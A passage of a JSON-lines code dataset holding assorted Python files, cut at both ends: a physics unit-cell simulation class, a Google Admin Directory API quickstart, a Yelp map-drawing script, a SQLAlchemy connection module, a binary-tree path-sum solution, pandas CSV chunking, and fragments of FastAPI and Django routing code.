Depends(get_db)):\n db_season = crud.get_points_by_season(db, season=season)\n if db_season is None:\n raise HTTPException(status_code=404, detail=\"Season not found\")\n return db_season\n","sub_path":"app/routers/seasons.py","file_name":"seasons.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"135386560","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# This file is part of the udkm1Dsimpy module.\n#\n# udkm1Dsimpy is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, see .\n#\n# Copyright (C) 2019 Daniel Schick\n\n__all__ = [\"UnitCell\"]\n\n__docformat__ = \"restructuredtext\"\n\nimport numpy as np\nfrom inspect import isfunction\nfrom sympy import integrate, Symbol\nfrom sympy.utilities.lambdify import lambdify\nfrom tabulate import tabulate\nfrom . import u, Q_\n\n\nclass UnitCell:\n \"\"\"UnitCell\n\n The unitCell class hold different structural properties of real\n physical unit cells and also an array of atoms at different postions\n in the unit cell.\n\n Args:\n id (str): id of the UnitCell\n name (str): name of the UnitCell\n c_axis (float): c-axis of the UnitCell\n\n Keyword Args:\n a_axis (float): a-axis of the UnitCell\n b_axis (float): b-axis of the UnitCell\n deb_wal_fac (float): Debye Waller factor\n sound_vel (float): sound velocity\n phonon_damping (float): phonon damping\n opt_pen_depth (float): optical penetration depth\n opt_ref_index (float): refractive index\n opt_ref_index_per_strain (float): change of refractive index per\n strain\n heat_capacity (float): heat capacity\n therm_cond (float): thermal conductivity\n lin_therm_exp (float): linear thermal expansion\n sub_system_coupling (float): sub-system coupling\n\n Attributes:\n id (str): id of the unit cell\n name (str): name of the unit cell\n atoms (list[atom, @lambda]): list of atoms and funtion handle\n for strain dependent displacement\n num_atoms (int): number of atoms in unit cell\n spring_const (ndarray[float]): spring constant of the unit cell\n [kg/s²] and higher orders\n opt_ref_index (ndarray[float]): optical refractive index - real\n and imagenary part :math:`n + i\\kappa`\n opt_ref_index_per_strain (ndarray[float]): optical refractive\n index change per strain - real and imagenary part\n :math:`\\\\frac{d n}{d \\eta} + i\\\\frac{d \\kappa}{d \\eta}`\n therm_cond (list[@lambda]): list of HANDLES T-dependent thermal\n conductivity [W/(m K)]\n lin_therm_exp (list[@lambda]): list of HANDLES T-dependent\n linear thermal expansion coefficient (relative)\n int_lin_therm_exp (list[@lambda]): list of HANDLES T-dependent\n integrated linear thermal expansion coefficient\n heat_capacity (list[@lambda]): list of HANDLES T-dependent heat\n capacity function [J/(kg K)]\n int_heat_capacity (list[@lambda]): list of HANDLES T-dependent\n integrated heat capacity function\n sub_system_coupling (list[@lambda]): list of HANDLES of coupling\n functions of different subsystems [W/m³]\n num_sub_systems (int): number of subsystems for heat and phonons\n (electrons, lattice, spins, ...)\n\n \"\"\"\n\n def __init__(self, id, name, c_axis, **kwargs):\n self.id = id\n self.name = name\n self.c_axis = c_axis\n self.a_axis = kwargs.get('a_axis', self.c_axis)\n self.b_axis = kwargs.get('b_axis', self.a_axis)\n self.atoms = []\n self.num_atoms = 0\n self.mass = 0*u.kg\n self.density = 0*u.kg/u.m**2\n self.spring_const = np.array([0])\n self.deb_wal_fac = kwargs.get('deb_wal_fac', 0*u.m**2)\n self.sound_vel = kwargs.get('sound_vel', 0)\n self.phonon_damping = kwargs.get('phonon_damping', 0*u.kg/u.s)\n self.opt_pen_depth = kwargs.get('opt_pen_depth', 0*u.nm)\n self.opt_ref_index = kwargs.get('opt_ref_index', 0)\n self.opt_ref_index_per_strain = kwargs.get('opt_ref_index_per_strain', 0)\n self.heat_capacity, self.heat_capacity_str = self.check_cell_array_input(\n kwargs.get('heat_capacity', 0))\n self.therm_cond, self.therm_cond_str = self.check_cell_array_input(\n kwargs.get('therm_cond', 0))\n self.lin_therm_exp, self.lin_therm_exp_str = self.check_cell_array_input(\n kwargs.get('lin_therm_exp', 0))\n self.sub_system_coupling, self.sub_system_coupling_str = self.check_cell_array_input(\n kwargs.get('sub_system_coupling', 0))\n\n if (len(self.heat_capacity) == len(self.therm_cond)\n and len(self.heat_capacity) == len(self.lin_therm_exp)\n and len(self.heat_capacity) == len(self.sub_system_coupling)):\n self.num_sub_systems = len(self.heat_capacity)\n else:\n raise ValueError('Heat capacity, thermal conductivity, linear'\n 'thermal expansion and subsystem coupling have not'\n 'the same number of elements!')\n\n self.area = self.a_axis * self.b_axis\n self.volume = self.area * self.c_axis\n\n def __str__(self):\n \"\"\"String representation of this class\"\"\"\n output = [['id', self.id],\n ['name', self.name],\n ['a-axis', '{:.4~P}'.format(self.a_axis)],\n ['b-axis', '{:.4~P}'.format(self.b_axis)],\n ['c-axis', '{:.4~P}'.format(self.c_axis)],\n ['area', '{:.4~P}'.format(self.area.to('nm**2'))],\n ['volume', '{:.4~P}'.format(self.volume.to('nm**3'))],\n ['mass', '{:.4~P}'.format(self.mass)],\n ['density', '{:.4~P}'.format(self.density.to('kg/meter**3'))],\n ['Debye Waller Factor', self.deb_wal_fac.to('meter**2')],\n ['sound velocity', '{:.4~P}'.format(self.sound_vel.to('meter/s'))],\n ['spring constant', self.spring_const * u.kg/u.s**2],\n ['phonon damping', self.phonon_damping.to('kg/s')],\n ['opt. pen. depth', self.opt_pen_depth.to('nm')],\n ['opt. refractive index', self.opt_ref_index],\n ['opt. ref. index/strain', self.opt_ref_index_per_strain],\n ['thermal conduct.', ' W/(m K)\\n'.join(self.therm_cond_str) + ' W/(m K)'],\n ['linear thermal expansion', '\\n'.join(self.lin_therm_exp_str)],\n ['heat capacity', ' J/(kg K)\\n'.join(self.heat_capacity_str) + ' J/(kg K)'],\n ['subsystem coupling', ' W/m³\\n'.join(self.sub_system_coupling_str) + ' W/m³']]\n\n class_str = 'Unit Cell with the following properties\\n\\n'\n class_str += tabulate(output, headers=['parameter', 'value'], tablefmt=\"rst\",\n colalign=('right',), floatfmt=('.2f', '.2f'))\n class_str += '\\n\\n' + str(self.num_atoms) + ' Constituents:\\n'\n\n atoms_str = []\n for i in range(self.num_atoms):\n atoms_str.append([self.atoms[i][0].name,\n '{:0.2f}'.format(self.atoms[i][1](0)),\n self.atoms[i][2]])\n class_str += tabulate(atoms_str, headers=['atom', 'position', 'position function'],\n tablefmt=\"rst\")\n return class_str\n\n def clone_2_multiple(self, N, *args):\n \"\"\"clone_2_multiple\"\"\"\n# %% clone2multiple\n# % Returns a cloned unit cell N time repeated. Accordingly, all\n# % physical properties are adapted, *despite of any specific function\n# % handle of the atomic position in the unit cell and higher orders\n# % of spring constants!*\n# % If no _ID_ or _name_ is given for the cloned unit cell, the name\n# % of the current unit cell is taken plus $N$.\n# function clone = clone2multiple(obj,N,varargin)\n# % initialize input parser and define defaults and validators\n# p = inputParser;\n# p.addRequired('N' , @isnumeric);\n# p.addParamValue('ID' , [obj.ID num2str(N)] , @ischar);\n# p.addParamValue('name' , [obj.name num2str(N)] , @ischar);\n# % parse the input\n# p.parse(N,varargin{:});\n# % assign parser results\n# N = p.Results.N;\n# newID = p.Results.ID;\n# newName = p.Results.name;\n# % initialize the cloned object with required inputs\n# clone = unitCell(obj.ID,obj.name,obj.cAxis);\n# % copy all properties from the current to the cloned object\n# props = properties(obj);\n# for i = 1:length(props)\n# clone.(props{i}) = obj.(props{i});\n# end%for\n# % reset some _N_-dependent properties\n# clone.ID = newID;\n# clone.name = newName;\n# clone.cAxis = N*obj.cAxis;\n# clone.volume = N*obj.volume;\n# % reset all atom-dependent properties\n# clone.atoms = {};\n# clone.mass = 0;\n# clone.density = 0;\n# clone.springConst = 0;\n# clone.numAtoms = 0;\n# % add all atoms to cloned unit cell, but the position handle is\n# % transfered!\n# for i = 0:N-1\n# for j = 1:obj.numAtoms\n# clone.addAtom(obj.atoms{j,1},obj.atoms{j,2}(0)/N+i/N);\n# end%for\n# end%for\n# end%function\n pass\n\n def visualize(self, **kwargs):\n \"\"\"visualize\n\n Allows for 3D presentation of unit cell by allow for a & b\n coordinate of atoms.\n Also add magnetization per atom.\n\n Todo: use the avogadro project as plugin\n Todo: create unit cell from CIF file e.g. by xrayutilities\n plugin.\n\n \"\"\"\n import matplotlib.pyplot as plt\n import matplotlib.cm as cmx\n\n strains = kwargs.get('strains', 0)\n if not isinstance(strains, np.ndarray):\n strains = np.array([strains])\n\n colors = [cmx.Dark2(x) for x in np.linspace(0, 1, self.num_atoms)]\n atom_ids = self.get_atom_ids()\n\n for strain in strains:\n plt.figure()\n atoms_plotted = np.zeros_like(atom_ids)\n for j in range(self.num_atoms):\n if not atoms_plotted[atom_ids.index(self.atoms[j][0].id)]:\n label = self.atoms[j][0].id\n atoms_plotted[atom_ids.index(self.atoms[j][0].id)] = True\n plt.plot(1+j, self.atoms[j][1](strain), 'o',\n MarkerSize=10,\n markeredgecolor=[0, 0, 0],\n markerfaceColor=colors[atom_ids.index(self.atoms[j][0].id)],\n label=label)\n else:\n label = '_nolegend_'\n plt.plot(1+j, self.atoms[j][1](strain), 'o',\n MarkerSize=10,\n markeredgecolor=[0, 0, 0],\n markerfaceColor=colors[atom_ids.index(self.atoms[j][0].id)],\n label=label)\n\n plt.axis([0.1, self.num_atoms+0.9, -0.1, (1.1+np.max(strains))])\n plt.grid(True)\n\n plt.title('Strain: {:0.2f}%'.format(strain))\n plt.ylabel('relative Position')\n plt.xlabel('# Atoms')\n plt.legend()\n plt.show()\n\n def get_property_dict(self, **kwargs):\n \"\"\"get_property_dict\n\n Returns a dictionary with all parameters. objects or dicts and\n objects are converted to strings. if a type is given, only these\n properties are returned.\n\n \"\"\"\n # initialize input parser and define defaults and validators\n types = ['all', 'heat', 'phonon', 'xray', 'optical']\n properties_by_types = {'heat': ['_c_axis', '_area', '_volume', '_opt_pen_depth',\n 'therm_cond_str', 'heat_capacity_str',\n 'int_heat_capacity_str', 'sub_system_coupling_str',\n 'num_sub_systems'],\n 'phonon': ['num_sub_systems', 'int_lin_therm_exp_str', '_c_axis',\n '_mass', '_spring_const', '_phonon_damping'],\n 'xray': ['num_atoms', '_area', '_deb_wal_fac', '_c_axis'],\n 'optical': ['_c_axis', '_opt_pen_depth', 'opt_ref_index',\n 'opt_ref_index_per_strain'],\n }\n\n types = kwargs.get('types', 'all')\n attrs = vars(self)\n # define the property names by the given type\n if types == 'all':\n S = attrs\n else:\n S = dict((key, value) for key, value in attrs.items()\n if key in properties_by_types[types])\n\n return S\n\n def check_cell_array_input(self, inputs):\n \"\"\" check_cell_array_input\n\n Checks the input for inputs which are cell arrays of function\n handles, such as the heat capacity which is a cell array of N\n function handles.\n\n \"\"\"\n output = []\n outputStrs = []\n # if the input is not a list, we convert it to one\n if not isinstance(inputs, list):\n inputs = [inputs]\n # traverse each list element and convert it to a function handle\n for input in inputs:\n if isfunction(input):\n raise ValueError('Please use string representation of function!')\n output.append(input)\n outputStrs.append('no str representation available')\n elif isinstance(input, str):\n try:\n output.append(eval(input))\n outputStrs.append(input)\n except Exception as e:\n print('String input for unit cell property ' + input + ' \\\n cannot be converted to function handle!')\n print(e)\n elif isinstance(input, (int, float)):\n output.append(eval('lambda T: {:f}'.format(input)))\n outputStrs.append('lambda T: {:f}'.format(input))\n elif isinstance(input, object):\n output.append(eval('lambda T: {:f}'.format(input.to_base_units().magnitude)))\n outputStrs.append('lambda T: {:f}'.format(input.to_base_units().magnitude))\n else:\n raise ValueError('Unit cell property input has to be a single or '\n 'cell array of numerics, function handles or strings which can be'\n 'converted into a function handle!')\n\n return(output, outputStrs)\n\n @property\n def int_heat_capacity(self):\n \"\"\"get int_heat_capacity\n\n Returns the anti-derrivative of the temperature-dependent heat\n :math:`c(T)` capacity function. If the int_heat_capacity\n property is not set, the symbolic integration is performed.\n\n \"\"\"\n if hasattr(self, '_int_heat_capacity') and isinstance(self._int_heat_capacity, list):\n return self._int_heat_capacity\n else:\n self._int_heat_capacity = []\n self.int_heat_capacity_str = []\n try:\n T = Symbol('T')\n for i, hcs in enumerate(self.heat_capacity_str):\n integral = integrate(hcs.split(':')[1], T)\n self._int_heat_capacity.append(lambdify(T, integral))\n self.int_heat_capacity_str.append('lambda T : ' + str(integral))\n\n except Exception as e:\n print('The sympy integration did not work. You can set the'\n 'analytical anti-derivative of the heat capacity'\n 'of your unit cells as lambda function of the temperature'\n 'T by typing UC.int_heat_capacity = lambda T: c(T)'\n 'where UC is the name of the unit cell object.')\n print(e)\n\n return self._int_heat_capacity\n\n @int_heat_capacity.setter\n def int_heat_capacity(self, int_heat_capacity):\n \"\"\"set int_heat_capacity\n\n Set the integrated heat capacity manually when no sympy is\n installed.\n\n \"\"\"\n self._int_heat_capacity, self.int_heat_capacity_str = self.check_cell_array_input(\n int_heat_capacity)\n\n @property\n def int_lin_therm_exp(self):\n \"\"\"get int_lin_therm_exp\n\n Returns the anti-derrivative of the integrated\n temperature-dependent linear thermal expansion function. If the\n int_lin_therm_exp property is not set, the symbolic integration\n is performed.\n\n \"\"\"\n\n if hasattr(self, '_int_lin_therm_exp') and isinstance(self._int_lin_therm_exp, list):\n return self._int_lin_therm_exp\n else:\n self._int_lin_therm_exp = []\n self.int_lin_therm_exp_str = []\n try:\n T = Symbol('T')\n for i, ltes in enumerate(self.lin_therm_exp_str):\n integral = integrate(ltes.split(':')[1], T)\n self._int_lin_therm_exp.append(lambdify(T, integral))\n self.int_lin_therm_exp_str.append('lambda T : ' + str(integral))\n\n except Exception as e:\n print('The sympy integration did not work. You can set the'\n 'the analytical anti-derivative of the heat capacity'\n 'of your unit cells as lambda function of the temperature'\n 'T by typing UC.int_heat_capacity = lambda T: c(T)'\n 'where UC is the name of the unit cell object.')\n print(e)\n\n return self._int_lin_therm_exp\n\n @int_lin_therm_exp.setter\n def int_lin_therm_exp(self, int_lin_therm_exp):\n \"\"\"set int_lin_therm_exp\n\n Set the integrated linear thermal expansion coefficient manually\n when no sympy installed.\n\n \"\"\"\n self._int_lin_therm_exp, self.int_lin_therm_exp_str = self.check_cell_array_input(\n int_lin_therm_exp)\n\n def add_atom(self, atom, position):\n \"\"\" add_atom\n\n Adds an atomBase/atomMixed at a relative position of the unit\n cell.\n\n Update the mass, density and spring constant of the unit cell\n automatically:\n\n .. math:: \\kappa = m \\cdot (v_s / c)^2\n\n \"\"\"\n position_str = ''\n # test the input type of the position\n if isfunction(position):\n raise ValueError('Please use string representation of function!')\n pass\n elif isinstance(position, str):\n try:\n position_str = position\n position = eval(position)\n except Exception as e:\n print('String input for unit cell property ' + position + ' \\\n cannot be converted to function handle!')\n print(e)\n elif isinstance(position, (int, float)):\n position_str = 'lambda strain: {:e}*(strain+1)'.format(position)\n position = eval(position_str)\n else:\n raise ValueError('Atom position input has to be a scalar, or string'\n 'which can be converted into a lambda function!')\n\n # add the atom at the end of the array\n self.atoms.append([atom, position, position_str])\n # increase the number of atoms\n self.num_atoms = self.num_atoms + 1\n\n self.mass = 0*u.kg\n for i in range(self.num_atoms):\n self.mass = self.mass + self.atoms[i][0].mass\n\n self.density = self.mass / self.volume\n # set mass per unit area (do not know if necessary)\n self.mass = self.mass * 1*u.angstrom**2 / self.area\n self.calc_spring_const()\n\n def add_multiple_atoms(self, atom, position, Nb):\n \"\"\"add_multiple_atoms\n\n Adds multiple atomBase/atomMixed at a relative position of the\n unit cell.\n\n \"\"\"\n for i in range(Nb):\n self.addAtom(atom, position)\n\n def calc_spring_const(self):\n \"\"\"calc_spring_const\n\n Calculates the spring constant of the unit cell from the mass,\n sound velocity and c-axis\n\n .. math:: k = m \\, \\left(\\\\frac{v}{c}\\\\right)^2\n\n \"\"\"\n self.spring_const[0] = (self._mass * (self._sound_vel/self._c_axis)**2)\n\n def get_acoustic_impedance(self):\n \"\"\"get_acoustic_impedance\"\"\"\n Z = np.sqrt(self.spring_const[0] * self.mass/self.area**2)\n return Z\n\n def set_ho_spring_constants(self, HO):\n \"\"\"set_ho_spring_constants\n\n Set the higher orders of the spring constant for anharmonic\n phonon simulations.\n\n \"\"\"\n # reset old higher order spring constants\n self.spring_const = np.delete(self.spring_const, np.r_[1:len(self.spring_const)])\n self.spring_const = np.hstack((self.spring_const, HO))\n\n def get_atom_ids(self):\n \"\"\"get_atom_ids\n\n Returns a cell array of all atom ids in the unit cell.\n\n \"\"\"\n ids = []\n for i in range(self.num_atoms):\n if not self.atoms[i][0].id in ids:\n ids.append(self.atoms[i][0].id)\n\n return ids\n\n def get_atom_positions(self, *args):\n \"\"\"get_atom_positions\n\n Returns a vector of all relative postion of the atoms in the\n unit cell.\n\n \"\"\"\n if args:\n strain = args[0]\n else:\n strain = 0\n\n res = np.zeros([self.num_atoms])\n for i, atom in enumerate(self.atoms):\n res[i] = atom[1](strain)\n\n return res\n\n @property\n def a_axis(self):\n \"\"\"float: in-plane a-axis [m]\"\"\"\n return Q_(self._a_axis, u.meter).to('nm')\n\n @a_axis.setter\n def a_axis(self, a_axis):\n \"\"\"set.a_axis\"\"\"\n self._a_axis = a_axis.to_base_units().magnitude\n\n @property\n def b_axis(self):\n \"\"\"float: in-plane b-axis [m]\"\"\"\n return Q_(self._b_axis, u.meter).to('nm')\n\n @b_axis.setter\n def b_axis(self, b_axis):\n \"\"\"set.a_axis\"\"\"\n self._b_axis = b_axis.to_base_units().magnitude\n\n @property\n def c_axis(self):\n \"\"\"float: out-of-plane c-axis [m]\"\"\"\n return Q_(self._c_axis, u.meter).to('nm')\n\n @c_axis.setter\n def c_axis(self, c_axis):\n \"\"\"set.c_axis\"\"\"\n self._c_axis = c_axis.to_base_units().magnitude\n\n @property\n def mass(self):\n \"\"\"float: mass of unit cell normalized to area of 1 Ų [kg]\"\"\"\n return Q_(self._mass, u.kg)\n\n @mass.setter\n def mass(self, mass):\n \"\"\"set.mass\"\"\"\n self._mass = mass.to_base_units().magnitude\n\n @property\n def density(self):\n \"\"\"float: density of the unitCell [kg/m³]\"\"\"\n return Q_(self._density, u.kg/u.m**3)\n\n @density.setter\n def density(self, density):\n \"\"\"set.density\"\"\"\n self._density = density.to_base_units().magnitude\n\n @property\n def area(self):\n \"\"\"\n float: area of epitaxial unit cells need for normation for\n correct intensities) [m²]\n\n \"\"\"\n return Q_(self._area, u.m**2)\n\n @area.setter\n def area(self, area):\n \"\"\"set.area\"\"\"\n self._area = area.to_base_units().magnitude\n\n @property\n def volume(self):\n \"\"\"float: volume of unit cell [m³]\"\"\"\n return Q_(self._volume, u.m**3)\n\n @volume.setter\n def volume(self, volume):\n \"\"\"set.volume\"\"\"\n self._volume = volume.to_base_units().magnitude\n\n @property\n def deb_wal_fac(self):\n \"\"\"float: Debye-Waller factor [m²]\"\"\"\n return Q_(self._deb_wal_fac, u.m**2)\n\n @deb_wal_fac.setter\n def deb_wal_fac(self, deb_wal_fac):\n \"\"\"set.deb_wal_fac\"\"\"\n self._deb_wal_fac = deb_wal_fac.to_base_units().magnitude\n\n @property\n def sound_vel(self):\n \"\"\"float: sound velocity in the unit cell [m/s]\"\"\"\n return Q_(self._sound_vel, u.m/u.s)\n\n @sound_vel.setter\n def sound_vel(self, sound_vel):\n \"\"\"set.sound_vel\n If the sound velocity is set, the spring constant is\n (re)calculated.\n \"\"\"\n self._sound_vel = sound_vel.to_base_units().magnitude\n self.calc_spring_const()\n\n @property\n def phonon_damping(self):\n \"\"\"float: damping constant of phonon propagation [kg/s]\"\"\"\n return Q_(self._phonon_damping, u.kg/u.s)\n\n @phonon_damping.setter\n def phonon_damping(self, phonon_damping):\n \"\"\"set.phonon_damping\"\"\"\n self._phonon_damping = phonon_damping.to_base_units().magnitude\n\n @property\n def opt_pen_depth(self):\n \"\"\"\n float: penetration depth for pump always for 1st subsystem\n light in the unit cell [m]\n\n \"\"\"\n return Q_(self._opt_pen_depth, u.meter).to('nanometer')\n\n @opt_pen_depth.setter\n def opt_pen_depth(self, opt_pen_depth):\n \"\"\"set.opt_pen_depth\"\"\"\n self._opt_pen_depth = opt_pen_depth.to_base_units().magnitude\n","sub_path":"udkm1Dsim/unitCell.py","file_name":"unitCell.py","file_ext":"py","file_size_in_byte":25467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"285201203","text":"\n\n#calss header\nclass _BEATITUDES():\n\tdef __init__(self,): \n\t\tself.name = \"BEATITUDES\"\n\t\tself.definitions = [u'in the Bible, a group of statements made by Jesus: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_beatitudes.py","file_name":"_beatitudes.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"122844773","text":"from oauth2client.service_account import ServiceAccountCredentials\nfrom apiclient.discovery import build\nimport json\nfrom httplib2 import Http\n\nscopes = ['https://www.googleapis.com/auth/admin.directory.group.member',\n 'https://www.googleapis.com/auth/admin.directory.group.member.readonly',\n 'https://www.googleapis.com/auth/admin.directory.group',\n 'https://www.googleapis.com/auth/admin.directory.group.readonly']\ncredentials = ServiceAccountCredentials.from_json_keyfile_name(\n 'HvZtesting-ac06c2b07d6e.json',\n scopes=scopes\n )\n\n# Use this sub email as the subject to delegate on behalf of that user\naccount_sub = 'ctan@g.hmc.edu'\n\ndelegate_credentials = credentials.create_delegated(account_sub)\n\nhttp = credentials.authorize(Http())\n\ndirectory = build('admin', 'directory_v1', http=http)\n\nresponse = directory.groups().get(groupKey = \"hvztesting-l@g.hmc.edu\")\n# print(response.to_json())","sub_path":"googleGroup/adminsdk/quickstart.py","file_name":"quickstart.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"209194678","text":"from maps import *\nimport sys\nfrom PIL import Image, ImageDraw\nfrom yelpdata import *\n\ndef draw_options(term,location,yelp):\n maps(location,yelp)\n maps_legend(location,yelp)\n\n #Source: https://www.daniweb.com/programming/software-development/threads/83718/paste-a-image-into-another\n im = Image.new(\"RGB\", (1000,640), (220,20,60))\n icon = Image.open(\"maps.png\")\n x, y = icon.size\n im.paste(icon, (0,0,x,y))\n icon1 = Image.open(\"maps_legend.png\")\n x1, y1 = icon1.size\n im.paste(icon1, (650,20,x1+650,y1+20))\n im.save(\"options.png\",\"PNG\")\n\ndef draw_distance(term,location,yelp):\n best_location(location,yelp)\n best_location_legend(location,yelp)\n\n #Source: https://www.daniweb.com/programming/software-development/threads/83718/paste-a-image-into-another\n im = Image.new(\"RGB\", (640,640), \"white\")\n icon = Image.open(\"best_location.png\")\n icon1 = Image.open(\"best_location_legend.png\")\n x, y = icon.size\n x1, y1 = icon1.size\n im.paste(icon, (0,0,x,y))\n im.paste(icon1, (350,500,x1+350,y1+500))\n im.save(\"closest.png\")\n\ndef usage():\n print('This python program takes\\'options\\' or \\'closest\\' as a first argument,')\n print('then the search term as a second argument, and address/location in')\n print('NYC as the rest of the arguments')\n\nif __name__=='__main__':\n\n if len(sys.argv) < 4:\n usage()\n sys.exit(1)\n\n map_type = sys.argv[1]\n term = sys.argv[2]\n location = sys.argv[3:]\n\n yelp = YelpData()\n yelp.get_results(term,location)\n\n if sys.argv[1] == 'closest':\n draw_distance(term,location,yelp)\n elif sys.argv[1] == 'options':\n draw_options(term,location,yelp)\n else:\n usage()\n sys.exit(1)\n","sub_path":"draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"222676576","text":"import json\nfrom collections import OrderedDict\nfrom gen_spec import Encoder,Node,Stream\n\nblend=OrderedDict()\nnodes=[]\nnodes.append(Node(name=\"decode_0\", stage=\"decode\", delivery_function=None, config=None, lambda_function=None))\nnodes.append(Node(name=\"decode_1\", stage=\"decode\", delivery_function=None, config=None, lambda_function=None))\nnodes.append(Node(name=\"blend\", stage=\"blend\", delivery_function=\"pair_delivery_func\", config=None, lambda_function=None))\nnodes.append(Node(name=\"encode\", stage=\"encode_to_dash\", delivery_function=None, config=None, lambda_function=None))\nblend[\"nodes\"]=nodes\nstreams=[]\nstreams.append(Stream(src=\"input_0:chunks\", dst=\"decode_0:chunks\"))\nstreams.append(Stream(src=\"input_1:chunks\", dst=\"decode_1:chunks\"))\nstreams.append(Stream(src=\"decode_0:frames\", dst=\"blend:frames_0\"))\nstreams.append(Stream(src=\"decode_1:frames\", dst=\"blend:frames_1\"))\nstreams.append(Stream(src=\"blend:frames\", dst=\"encode:frames\"))\nstreams.append(Stream(src=\"encode:chunks\", dst=\"output_0:chunks\"))\nblend[\"streams\"]=streams\nwith open('blend.json', 'w') as f:\n json.dump(blend, f, indent=2, cls=Encoder)\n","sub_path":"pipespec/gen_blend.py","file_name":"gen_blend.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"307735167","text":"import logging\nfrom typing import Generator\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\n\nfrom opennem.exporter.encoders import opennem_deserialize, opennem_serialize\nfrom opennem.settings import settings\n\nDeclarativeBase = declarative_base()\n\nlogger = logging.getLogger(__name__)\n\n\ndef db_connect(db_name=None, debug=False):\n \"\"\"\n Performs database connection using database settings from settings.py.\n\n Returns sqlalchemy engine instance\n \"\"\"\n db_conn_str = settings.db_url\n\n connect_args = {}\n\n if db_conn_str.startswith(\"sqlite\"):\n connect_args = {\"check_same_thread\": False}\n\n try:\n return create_engine(\n db_conn_str,\n json_serializer=opennem_serialize,\n json_deserializer=opennem_deserialize,\n echo=debug,\n pool_size=10,\n pool_timeout=60,\n connect_args=connect_args,\n )\n except Exception as exc:\n logger.error(\"Could not connect to database: %s\", exc)\n\n\nengine = db_connect()\nSessionLocal = sessionmaker(bind=engine, autocommit=False, autoflush=False,)\n\n\ndef get_database_session() -> Generator:\n \"\"\"\n Gets a database session\n\n \"\"\"\n try:\n s = SessionLocal()\n yield s\n except Exception as e:\n raise e\n finally:\n s.close()\n\n\ndef get_database_engine():\n \"\"\"\n Gets a database engine connection\n\n \"\"\"\n return engine\n","sub_path":"opennem/db/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"419651999","text":"\"\"\"\n113. Path Sum II\nGiven a binary tree and a sum, find all root-to-leaf paths where each path's sum equals the given sum.\n\nFor example:\nGiven the below binary tree and sum = 22,\n 5\n / \\\n 4 8\n / / \\\n 11 13 4\n / \\ / \\\n 7 2 5 1\nreturn\n[\n [5,4,11,2],\n [5,8,4,5]\n]\n\"\"\"\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def pathSum(self, root, sumVal):\n \"\"\"\n :type root: TreeNode\n :type sum: int\n :rtype: List[List[int]]\n \"\"\"\n if root == None: return []\n if root.left == None and root.right == None:\n if root.val == sumVal:\n return [[root.val]]\n else:\n return []\n result = self.pathSum(root.left, sumVal- root.val) + self.pathSum(root.right,sumVal - root.val)\n return [[root.val]+x for x in result]\n \n# Note: I think this is not an efficient method, please see another file","sub_path":"TreeSummation/pathSumII_0.py","file_name":"pathSumII_0.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"106618333","text":"import pandas as pd\r\n\r\n# read big\r\n# https://stackoverflow.com/a/25962187/10064174\r\nwith pd.read_csv(\"C:/REPOSITORIES/MyRepo/PYTHON/python_big_files_handling_web_scraping/sample.csv\", chunksize=2) as reader:\r\n for chunk in reader:\r\n print(chunk)\r\n\r\n\r\n# write big\r\n# https://stackoverflow.com/a/38531304/10064174\r\ndef get_chunk():\r\n yield pd.DataFrame({\"a\": [1,2], \"b\": [11,22], \"c\": [111,222]})\r\n yield pd.DataFrame({\"a\": [3,4], \"b\": [33,44], \"c\": [333,444]})\r\n yield pd.DataFrame({\"a\": [5], \"b\": [55], \"c\": [555]})\r\n\r\n\r\nheader = True\r\nfor chunk in get_chunk():\r\n chunk.to_csv(\"C:/REPOSITORIES/MyRepo/.trash/output.csv\", mode=\"a\", index=False,header=header)\r\n header=False","sub_path":"python/python_data_handling/001_csv.py","file_name":"001_csv.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"154276668","text":"# -*- coding: utf-8 -*-\n\n# pyKol - Gestion de colles en CPGE\n# Copyright (c) 2018 Florian Hatat\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n\nfrom django.conf.urls import url\nfrom django.urls import path, include\n\nfrom . import views\n\ncolles_urlpatterns = [\n\tpath('', views.colles.colle_list, name='colle_list'),\n\tpath('a_noter/', 